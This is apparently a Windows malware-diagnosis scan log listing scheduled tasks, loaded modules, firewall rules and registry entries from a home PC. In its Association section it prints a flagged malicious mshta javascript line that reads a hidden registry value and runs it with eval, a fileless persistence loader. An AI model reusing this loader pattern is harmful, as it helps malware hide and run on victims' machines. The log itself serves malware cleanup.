Task: {48DC4AB3-C811-4ECB-9E3A-A6A6524B818A} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-16] (Microsoft Corporation)
Task: {4CA6A15D-F7D4-4A5E-A459-02C3D7A918ED} - System32\Tasks\AdobeAAMUpdater-1.0-Family-HP-Harold => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-07-29] (Adobe Systems Incorporated)
Task: {503702D7-8726-42F3-A652-BB92440B76A9} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {5B81FDF8-ED83-46EE-A37D-5B1873C6749A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-10-16] (Microsoft Corporation)
Task: {5DD8248E-8722-4B28-988D-E4EBA31A6359} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {67E774AF-0852-423D-8009-EAE259C264FD} - System32\Tasks\Norton 360\Norton Autofix => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {74960916-8CB4-4A24-9C21-266DBF7C1613} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {75E207A5-0575-446A-974A-D178024369F1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {7B0DFFF0-6088-41CF-A75A-878BA845C91F} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {81765BEE-8AF2-4FF5-80D0-C63E6288499F} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\WSCStub.exe [2016-09-23] (Symantec Corporation)
Task: {825A3C24-77CF-4714-9606-2BE4B48D1F62} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {8465E2C1-36AD-4EA3-8ECA-5C561635B621} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {84FCEDEB-E654-4B38-A70B-F075470035AE} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001Core => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-18] (Dropbox, Inc.)
Task: {93A7D963-C244-48C0-9F7E-A1FEC4DD4988} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-13] (Google Inc.)
Task: {9713BC3E-0AC3-4171-A0EE-98442F1E2616} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe
Task: {9807A776-7233-41F8-8398-58A2D5B427E6} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {9841A8F5-191B-4208-8136-10342C786C91} - System32\Tasks\HPCeeScheduleForFAMILY-HP$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-14] (Hewlett-Packard)
Task: {9D68AD1A-3850-45B6-BC03-009D74EB709E} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A1D35F98-7D4F-4EC2-9239-00601DC46FCE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A489B528-91C6-4184-A0AF-723508AC6495} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {A894259E-D7D0-41BB-AED3-1D8F66401E39} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {ADB4577D-E3EE-48DE-80FF-D50842CE94D3} - System32\Tasks\Seagate_Install_Launch => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Dashboard.exe [2016-04-05] (Seagate Technology LLC)
Task: {B10439E1-E185-4DB2-807B-DD6AC98B530E} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B92A5C1F-2083-497F-B44F-60F380623673} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C36A6DB5-4989-40D8-885A-EB418B1C97FD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C4D5D3CC-58F8-43D2-AC4F-FA91F4439F57} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C6543766-4A8C-472F-8B19-CAFBF8CB18B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {C98DFB27-2DF4-44DD-AB90-0DA62145D355} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {CD289DED-2CCC-46B1-B7A6-D863153BD078} - System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => pcalua.exe -a L:\Setup.exe -d L:\
Task: {CF494223-B5BE-44DD-BC86-E043FE9BDA75} - System32\Tasks\HPCeeScheduleForHarold => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-14] (Hewlett-Packard)
Task: {CFC27006-0508-4E5A-B01F-AE139D853F8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {D103E47D-4E8F-4DB8-9F58-4A2B330AA29C} - System32\Tasks\Harold DBAgent 2 0 => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [2016-04-05] (Seagate Technology LLC)
Task: {D82A5397-CB31-4135-8EE6-A6301B2406D1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {DD72660A-44FA-4233-AD9B-57D2A45890AB} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001UA => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-18] (Dropbox, Inc.)
Task: {E1A6A9A7-DC91-44A2-AF53-A93F86A9DB38} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {E3935011-F49E-492E-8B40-1448F23D743E} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe
Task: {E8FA7856-F1C0-48C9-88EE-4613503C97E8} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {F2ADC65E-7099-42E2-B116-6BE9B5C5EED2} - System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe"
Task: {F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {F809B3DB-23B7-4759-B88C-17638039582F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {FC168DBD-8327-4CC8-BEBE-28B294DC8806} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001Core.job => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1355648730-1136835254-2900194302-1001UA.job => C:\Users\Harold\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForFAMILY-HP$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForHarold.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Harold\AppData\Local\0d9f76\909634.lnk -> C:\Users\Harold\AppData\Local\0d9f76\2eb755.bat ()

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 07:42 - 2016-07-16 07:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-29 18:37 - 2016-09-15 13:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-25 17:44 - 2016-08-01 08:54 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-03-20 18:12 - 2015-03-20 18:12 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-03-20 18:12 - 2015-03-20 18:12 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 20:03 - 2012-05-18 20:03 - 00011776 _____ () C:\Program Files (x86)\Dokan\DokanLibrary\mounter.exe
2013-02-01 16:09 - 2013-02-01 16:09 - 12907520 _____ () C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe
2016-02-16 17:28 - 2016-01-22 22:55 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2009-12-15 21:40 - 2009-12-15 21:40 - 00065536 _____ () C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpert.exe
2016-09-29 18:37 - 2016-09-15 13:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-25 18:36 - 2016-09-25 18:36 - 01864384 _____ () C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64\ClientTelemetry.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-08-28 19:13 - 2015-02-27 14:38 - 00721263 _____ () C:\WINDOWS\SysWOW64\ISCM64.dll
2016-09-25 21:33 - 2016-09-25 21:33 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-10-12 21:34 - 2016-10-05 05:35 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-10-29 14:22 - 2016-10-14 23:34 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2010-09-15 14:31 - 2010-09-15 14:31 - 00611896 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2016-05-12 00:39 - 2016-05-12 00:39 - 01088944 _____ () C:\Program Files\GoPro\GoPro Desktop App\GoProDesktopSystemTray.exe
2016-05-12 00:39 - 2016-05-12 00:39 - 00037808 _____ () C:\Program Files\GoPro\GoPro Desktop App\GoProDeviceDetection.exe
2016-10-20 10:11 - 2016-10-20 10:12 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-10-20 10:11 - 2016-10-20 10:12 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-10-20 10:11 - 2016-10-20 10:12 - 35253760 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.197.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2009-12-16 03:44 - 2009-12-16 03:44 - 00516096 _____ () C:\Program Files (x86)\AMD\RAIDXpert\bin\libxml2.dll
2016-02-16 17:28 - 2016-01-22 22:55 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-09-25 18:36 - 2016-09-25 18:36 - 01383616 _____ () C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\ClientTelemetry.dll
2016-09-25 18:36 - 2016-09-25 18:36 - 00118976 _____ () C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileSyncViews.dll
2010-11-22 18:00 - 2010-11-22 18:00 - 02121728 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtCore4.dll
2010-11-22 18:00 - 2010-11-22 18:00 - 07745536 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtGui4.dll
2010-11-22 18:00 - 2010-11-22 18:00 - 00135168 _____ () C:\Program Files (x86)\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2016-10-29 07:56 - 2016-10-10 14:19 - 00035792 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2016-10-29 07:55 - 2016-10-10 14:19 - 00145864 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2016-10-29 07:55 - 2016-10-10 14:19 - 00019408 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00116688 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2016-10-29 07:56 - 2016-10-10 14:19 - 00100296 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00018888 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\select.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00019760 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00694224 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00020816 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2016-10-29 07:56 - 2016-10-10 14:20 - 00123856 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 01682760 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00020808 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00105928 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32api.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00021312 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.crt.compiled._winffi_crt.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00052024 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00038696 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\fastpath.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00392144 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2016-10-29 07:55 - 2016-10-10 14:21 - 00020936 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00024528 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32event.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00116176 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32security.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00381752 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00124880 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32file.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00025424 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00024016 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00175560 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32gui.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00030160 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00043472 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32process.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00048592 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32service.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00057808 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32evtlog.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00024016 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32profile.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00246592 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00026456 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-10-29 07:56 - 2016-10-10 14:20 - 00241104 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\_jpegtran.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00020280 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00028616 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32ts.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00023376 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00020800 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00019776 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.winerror._winffi_winerror.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00020800 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.wininet._winffi_wininet.pyd
2016-10-29 07:56 - 2016-10-10 14:21 - 00350152 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00022352 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winverifysignature.compiled._VerifySignature.pyd
2016-10-29 07:55 - 2016-10-24 09:15 - 00024392 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2016-10-29 07:55 - 2016-10-10 14:17 - 00036296 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\librsync.dll
2016-10-29 07:55 - 2016-10-24 09:15 - 00031568 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\enterprise_data.compiled._enterprise_data.pyd
2016-10-29 07:55 - 2016-10-24 09:06 - 00293392 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\EnterpriseDataAdapter.dll
2016-10-29 07:55 - 2016-10-24 09:15 - 00084280 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2016-10-29 07:55 - 2016-10-24 09:15 - 01826096 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2016-10-29 07:56 - 2016-10-10 14:19 - 00083912 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\sip.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00531248 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 03928880 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2016-10-29 07:56 - 2016-10-24 09:15 - 01972528 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00133424 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00224056 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00207672 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00020288 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.user32._winffi_user32.pyd
2016-10-29 07:55 - 2016-10-10 14:24 - 00017864 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\libEGL.dll
2016-10-29 07:55 - 2016-10-10 14:24 - 01631184 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2016-10-29 07:56 - 2016-10-10 14:21 - 00060880 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\win32print.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00037192 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\windisplaytoast.compiled._DisplayToast.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00024904 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00546096 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00357680 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00042808 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebChannel.pyd
2016-10-29 07:56 - 2016-10-24 09:16 - 00168760 _____ () C:\Users\Harold\AppData\Roaming\Dropbox\bin\PyQt5.QtWebEngineWidgets.pyd
2015-03-28 08:16 - 2014-10-31 16:40 - 01498112 _____ () C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2015-03-28 08:16 - 2014-05-19 17:19 - 00137728 _____ () C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2016-09-29 18:37 - 2016-09-15 13:25 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee: "C:\WINDOWS\system32\mshta.exe" "javascript:A8gDIF="gQr";A6C=new ActiveXObject("WScript.Shell");Zq58tMz="n";U0FdG=A6C.RegRead("HKCU\\software\\sdca\\hzqzf");Vo7QZ3="pCt64";eval(U0FdG);PlZSb8ur="l3m7Wyvw";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxps://apps.driversupport.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 209.18.47.61 - 209.18.47.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{23C2E20F-3C1F-4E81-9CDE-72F5186F3E5A}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe
FirewallRules: [{7B94AF42-06DC-4BBE-9F2E-4B9AE6F8086D}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe
FirewallRules: [{582CE1FB-42D9-4076-8D1E-BD00A15720B7}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoProLauncher.exe
FirewallRules: [{1AF87282-EBF2-41F9-BB3A-F0DCBD9B47D3}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoProIDService.exe
FirewallRules: [{74731D7A-B1EE-4EAC-9E82-4A98AEBFD2E5}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoProMsgBus.exe
FirewallRules: [{CEE11C76-190A-4A8F-9DCE-2249CC0FCB66}] => (Allow) C:\Program Files\GoPro\GoPro Desktop App\GoPro.exe
FirewallRules: [{5ABA28D5-8EDA-4C5F-B954-9D91684DCDA2}] => (Allow) LPort=8888
FirewallRules: [{6522305D-8C0A-4651-A5D6-CD5497C2C949}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{A1A2D9AA-96F8-44F5-A578-1160BFEA260F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{86BE245E-761B-404E-B072-2F9980213A75}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{15C448A7-236F-4385-A17F-E1C803C8EA68}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{095DF4EC-B330-4319-8BD9-EDAFBCFCA5A2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
